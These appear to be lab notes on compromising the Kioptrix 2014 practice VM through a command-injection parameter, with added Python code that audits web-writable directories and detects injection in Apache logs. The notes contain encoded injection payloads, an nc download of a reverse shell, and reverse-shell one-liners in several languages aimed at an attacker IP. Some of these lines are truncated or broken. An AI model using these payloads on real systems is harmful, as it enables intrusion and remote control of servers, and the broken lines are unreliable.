Kioptrix 2014

Kioptrix 2014 Notes - Full walkthrough to be updated


httpd.conf file

httpd Error Log

Executing system commands:

;id > out.txt&pdf=make

File creation tests

Create a file that shows the phpinfo of the system in the virtual directory /files/. This directory is writable by the web user www:

;echo%20%22%3C?php%20phpinfo()%20?%3E%22%20%3E%20./files/zzz.php;&pdf=make

This is now listable from the URL.

We can prove we can write HTML too by creating a very simple test file and requesting it to see the outcome:

;echo%20%22%3Ch1%3Etest123%3C/h1%3E%22%20%3E%20test123.html;&pdf=make
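The two tests above work because a directory under the web root is writable by the www user and PHP still executes from it. The following audit is an added example (not from the original notes and not part of any Kioptrix or Apache tooling): it walks a document root and reports every directory the web-server identity could write to, together with any PHP scripts already sitting there. The uid/gid of 80 is taken from the `id` output later in these notes; the directory layout built by `build_sample_docroot()` is constructed for the demonstration.

```python
"""Audit a web document root for directories writable by the web-server
user that also hold PHP scripts (added example, not the notes' own code)."""
import os
import stat
import tempfile

WWW_UID = 80   # uid=80(www) gid=80(www), as shown in the shell output of the notes
WWW_GID = 80
SCRIPT_EXT = (".php", ".phtml")


def writable_by(st, uid, gid):
    """True if a process running as uid/gid could write to an object with stat st."""
    mode = st.st_mode
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return True
    if st.st_gid == gid and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def owner_ids(path):
    """(uid, gid) owning path; handy for testing against the current user."""
    st = os.stat(path)
    return st.st_uid, st.st_gid


def audit_docroot(docroot, uid=WWW_UID, gid=WWW_GID):
    """Return sorted [(relative_dir, [script names])] for every directory
    under docroot that uid/gid could write to. The script list is empty when
    the directory is writable but no PHP file has been dropped there yet."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(docroot):
        if not writable_by(os.lstat(dirpath), uid, gid):
            continue
        scripts = sorted(f for f in filenames if f.lower().endswith(SCRIPT_EXT))
        findings.append((os.path.relpath(dirpath, docroot), scripts))
    return sorted(findings)


def build_sample_docroot():
    """Constructed layout: files/ is world-writable (like /files/ in the notes)
    and already contains a dropped zzz.php; images/ is read-only for www."""
    root = tempfile.mkdtemp(prefix="docroot-")
    for name, mode in (("files", 0o777), ("images", 0o755)):
        path = os.path.join(root, name)
        os.mkdir(path)
        os.chmod(path, mode)
    with open(os.path.join(root, "files", "zzz.php"), "w") as fh:
        fh.write("<?php phpinfo() ?>\n")
    with open(os.path.join(root, "images", "logo.png"), "wb") as fh:
        fh.write(b"\x89PNG")
    os.chmod(root, 0o755)
    return root


if __name__ == "__main__":
    sample = build_sample_docroot()
    for rel, scripts in audit_docroot(sample):
        extra = f", scripts present: {scripts}" if scripts else ""
        print(f"{rel}: writable by uid {WWW_UID}{extra}")
```

A directory that the web user must be able to write to (uploads, generated reports) should not also serve scripts: in Apache that means no `Indexes` in its `Options` and, with mod_php, `php_admin_flag engine off` for that `<Directory>`. The audit only looks at filesystem permissions, so it flags candidates for that treatment rather than proving a listing is exposed.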

Trying to create a backdoor.
Working method:

First we edit Pentest Monkey's php-reverse-shell with the attacker's IP and port 443. This could be changed to a different port depending on needs and the firewall.

Next we create a file called get.txt and add to it the line we want sent once the file is used. The command within get.txt will download our reverse shell file later:

;printf%20%22GET%20http://\r\n\r\n%22%20%3E%20get.txt;&pdf=make

Now we copy the r.txt file to our Apache web server. (When doing this originally with Python's simple HTTP server it didn't work, for some unknown reason.)

Make sure the file is in the web root, like so: "/var/www/html/r.txt"

Now we use nc to fetch r.txt from the attacker's machine (feeding it the request in get.txt) and save the downloaded reverse shell as r.php:

;%20nc%20192.168.0.100%2080%20%3C%20get.txt%20%3E%20r.php;%20&pdf=make

Next we set up our nc listener:

nc -l -v -p 4444

Now we execute the PHP file.

And voilà, a shell :-)

listening on [any] 4444 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 60832
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012  amd64
10:47PM  up  6:15, 0 users, load averages: 0.00, 0.00, 0.00
USER       TTY      FROM                      LOGIN@  IDLE WHAT
uid=80(www) gid=80(www) groups=80(www)
sh: can't access tty; job control turned off

Things that didn't work:

Using PHP:

;php%20-r%20%27$sock=fsockopen(%22192.168.0.100%22,443);exec(%22/bin/sh%20-i%20%3C&6%20%3E&6%202%3E&6%22);%27;&pdf=make

Using nc - here we get a connection that disconnects again immediately:

;/bin/sh%20|%20nc%20192.168.0.100%20443;&pdf=make

#:~ sudo nc -l -p 443 -vvv
listening on [any] 443 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 62073
 sent 1, rcvd 0

Tried on ports 4444, 2345 and 5050 to no avail.
Maybe the firewall is blocking our connection.

Using nc another way:

;/bin/sh%20|%20nc%20-l%201234;&pdf=make

Using Python (three variants, with different interpreter paths):

;/usr/local/bin/python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);[%22/bin/sh%22,%22-i%22]);%27;&pdf=make

;/usr/local/bin/python2.7%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);[%22/bin/sh%22,%22-i%22]);%27;&pdf=make

;/usr/local/include/python2.7%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.0.100%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);[%22/bin/sh%22,%22-i%22]);%27;&pdf=make

Let's check where Python is located and send the output to a file under the listable '/files/' directory.

Using 'locate', like so:

;locate%20python%20%3E%20./files/out.txt&pdf=make

Now we open the file by:
##Output ## 

Using Perl:

;/usr/bin/perl%20-e%20%27use%20Socket;$i=%22192.168.0.100%22;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(%22tcp%22));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,%22%3E&S%22);open(STDOUT,%22%3E&S%22);open(STDERR,%22%3E&S%22);exec(%22/bin/sh%20-i%22);};%27;&pdf=make

Using Ruby:

;/usr/bin/,4444).to_i;exec%20sprintf(%22/bin/sh%20-i%20%3C&%d%20%3E&%d%202%3E&%d%22,f,f,f)%27;&pdf=make
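Every request in these notes, the working path as well as the attempts that failed, went through the same injected parameter and left the same shape in the web server's access log: a percent-encoded value containing shell metacharacters or an interpreter invocation, followed by `&pdf=make`. The detector below is an added example (not from the original notes and not part of any tool named here) that parses Apache combined-format log lines and flags that shape, plus any request for a script inside the writable /files/ directory. The log lines, client addresses, the `/index.php` path and the `data` parameter name are constructed; the injected values are the ones shown above.

```python
"""Flag command-injection attempts in Apache access-log query strings
(added example, not the notes' own code)."""
import re
from urllib.parse import unquote_plus, urlsplit

# Apache "combined" format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Shell metacharacters that never belong in a parameter value of this app
# (the notes rely on ; > and |), and interpreter names seen in the attempts.
META_RE = re.compile(r'[;|`<>]|\$\(|&&')
INTERP_RE = re.compile(r'(?:^|[\s;|])(?:/bin/sh|nc|php|python[\d.]*|perl|ruby)\b')

# Directory the notes show as writable by www and listable: a script being
# served from it is a finding on its own, even without the injection.
UPLOAD_DIR = "/files/"

# Constructed log lines (constructed addresses, path and parameter name);
# the injected values mirror the payloads in the notes. Line 4 is benign.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2014:22:40:01 +0000] "GET /index.php?data=1;id%20%3E%20out.txt&pdf=make HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2014:22:40:09 +0000] "GET /index.php?data=1;echo%20%22%3C?php%20phpinfo()%20?%3E%22%20%3E%20./files/zzz.php;&pdf=make HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2014:22:41:02 +0000] "GET /index.php?data=1;/bin/sh%20|%20nc%20192.168.0.100%20443;&pdf=make HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2014:22:41:30 +0000] "GET /index.php?data=2014&pdf=make HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2014:22:43:12 +0000] "GET /files/zzz.php HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""


def decode_params(query):
    """Split a query string on & only (never on ;, which is part of the
    injected value) and percent-decode each key and value."""
    params = []
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, val = pair.partition("=")
        params.append((unquote_plus(key), unquote_plus(val)))
    return params


def inspect_request(target):
    """Return the list of rule names triggered by one request target."""
    parts = urlsplit(target)
    hits = []
    for key, val in decode_params(parts.query):
        if META_RE.search(val):
            hits.append("shell-metachar:" + key)
        if INTERP_RE.search(val):
            hits.append("interpreter:" + key)
    if parts.path.startswith(UPLOAD_DIR) and parts.path.endswith(".php"):
        hits.append("script-in-upload-dir")
    return hits


def scan_log(text):
    """Parse each log line and collect findings as dicts; unparsable lines
    are skipped rather than treated as matches."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        rules = inspect_request(m.group("target"))
        if rules:
            findings.append({
                "line": lineno,
                "src": m.group("src"),
                "target": unquote_plus(m.group("target")),
                "rules": rules,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} from {f['src']}: {', '.join(f['rules'])}")
        print("    " + f["target"])
```

Decoding before matching matters: the notes' payloads reach the server as `%3E` and `%20`, so a rule written against the raw request line would miss `>` entirely. The `script-in-upload-dir` rule catches the second stage even when the injection itself happened over a channel that was not logged, which is the case to alert on first.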

